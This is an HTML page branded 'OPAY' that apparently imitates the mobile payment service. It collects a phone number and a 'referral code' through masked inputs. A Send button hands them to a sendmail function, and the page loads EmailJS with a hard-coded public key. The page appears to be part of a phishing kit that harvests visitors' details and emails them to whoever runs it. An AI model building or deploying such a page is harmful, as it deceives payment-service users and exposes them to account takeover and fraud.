<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>OPAY</title>
    <script type="text/javascript"
    src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js">
    </script>
    <script type="text/javascript">
    (function(){
    emailjs.init({
    publicKey: "brHvxqtsePQc4PuqQ",
    });
    })();
    </script>         
    <script src="script.js"></script>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f9;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .login-container {
            background:lime;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 400px;
        }
        .login-container h2 {
            text-align: center;
            margin-bottom: 20px;
            color: #333;
        }
        .form-group {
            margin-bottom: 15px;
        }
        .form-group label {
            display: block;
            margin-bottom: 5px;
            color: #555;
        }
        .form-group input {
            width: 100%;
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 5px;
        }
        .form-group button {
            width: 100%;
            padding: 10px;
            background-color:greenyellow;
            color: #ffffff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
        .form-group button:hover {
            background-color:lightgreen;
        }
    </style>
</head>
<body>
    <div class="login-container" >
        <h1 style="margin-left: 35%;">OPAY</h1>
      
            <div class="form-group">
            </div>
            <div class="form-group">
                <label for="password">phone number</label>
                <input type="password" id="password" name="password" required>
                <label for="password">referral code</label>
                <input type="password" id="password" name="password" required>
            </div>
            <div class="login-container" style="background-color:lawngreen;height:40px;width: 350px;;">
            <button type="submit" onclick="sendmail(event)">Send</button>
            <a href="index2.html" style="margin-left: 40%; font-size: 40px;">login</a>
            </div>
        </form>
    </div>
    
</body>
</html>
